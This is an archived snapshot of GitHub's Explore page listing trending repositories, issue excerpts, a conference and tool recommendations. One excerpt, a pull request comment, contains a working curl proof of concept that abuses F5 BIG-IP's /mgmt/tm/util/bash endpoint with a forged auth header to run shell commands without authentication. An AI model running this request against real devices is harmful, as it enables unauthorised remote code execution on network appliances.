The Wayback Machine - https://web.archive.org/web/20220511012740/https://github.com/explore
Skip to content

Here's what's popular on GitHub today...

Trending repository

Ph33rr
Ph33rr commented May 9, 2022

Template / PR Information

add more POC

for "401 F5 Authorization Required" error we need to use host: localhost or localhost:8100

req:

curl -X POST https:///mgmt/tm/util/bash -H "X-F5-Auth-Token: a" -H "Authorization: Basic YWRtaW46" -d '{ "command":"run", "utilCmdArgs":"-c id" }' -H "Connection: keep-alive,X-F5-Auth-Token" -H "Content-Type: application/json" --insecure -v

CSS logo

Popular topic

Cascading Style Sheets (CSS) is a language used most often to style and improve upon the appearance of views.
Octogatos Conf20 Call for Papers

Upcoming event recommended by GitHub

Apr
22

Octogatos Conf20 Call for Papers

April 22, 2022 - September 25, 2022 • Virtual

Amplify, promote and empower the voices of Latinx in tech. You belong here! Let’s join forces and share our expertise with other Latinx — let’s shine together.

App recommended by GitHub

abaplint

Overview

abaplint.app, quality checks and static analysis for the ABAP programming language.

Automatically run quality checks and static analysis for each change and pull request in the repository.

The application works with SAP ABAP code serialized using abapGit.

tauri

Trending repository

p32929
p32929 commented Apr 10, 2022

Describe the bug

Hello, first of all, thank you for making and maintaining Tauri.
So, 've been making a test app using Tauri. but it seems, the CTRL/COMMAND + Z keyboard shortcut ( along with many other keyboard shortcuts ) stops working inside the app.

I also have added a menu like this one: https://github.com/windht/watcher/blob/bd929e555319c3e6c4565a2631b63a04918c03fb/src-tauri/src/m

nginxconfig.io

Trending repository

RebelliousWhiz
RebelliousWhiz commented Dec 29, 2021

Sorry for not following the template. It's a straightforward question.

By enabling "WordPress-specific rules", the following codes will be added to the wordpress.conf:

# WordPress: deny general stuff
location ~* ^/(?:xmlrpc\.php|wp-links-opml\.php|wp-config\.php|wp-config-sample\.php|readme\.html|license\.txt)$ {
    deny all;
}

However, this disables xmlrpc feature, which disa

enhancement help wanted good first issue hacktoberfest

Trending repository

This repository is my documenting repository for learning the world of DevOps. I started this journey on the 1st January 2022 and I plan to run to March 31st for a complete 90-day romp on spending an hour a day including weekends to get a foundational knowledge across a lot of different areas that make up DevOps.

  • Updated May 10, 2022
  • Shell

Trending repository

Booking Microservices is a Sample application for booking ticket. This application based on different software architecture and technologies like .Net Core, CQRS, DDD, Vertical Slice Architecture, Docker, kubernetes, tye, masstransit, RabbitMQ, Grpc, yarp reverse proxy, Identity Server, Redis, SqlServer, Entity Framework Core, Event Sourcing and different level of testing.

  • Updated May 10, 2022
  • C#

Trending repository

lukasm91
lukasm91 commented Aug 24, 2019

GTest exports the following targets:

  • GTest::gtest
  • GTest::gtest_main
  • GTest::gmock
  • GTest::gmock_main

This targets should also be available when adding gtest with add_subdirectory (or FetchContent), because this should behave the same way as adding GTest with find_package. So somewhere, we should add the aliases to these targets, i.e.

add_library(GTest::gtest ALIAS 

Trending repository

gotoing
gotoing commented Feb 15, 2022

Add a network option in creating workload

image

like rancher‘s Networking tab

image

** During workload creation, user can customize own hosts and DNS search doma

help wanted good first issue kind/design kind/feature-request

App recommended by GitHub

Semgrep

Semgrep is a fast, open-source, static analysis tool for modern languages. With 1,000+ existing rules and simple-to-create custom ones, it finds the bugs that matter.

  • Open source, works on 17+ languages
  • Scan with 1,500+ community rules
  • Write rules that look like your code
  • Quickly get results in the terminal, editor, or CI/CD
  • Flag issues moving forward, get results in pull requests, Slack, + more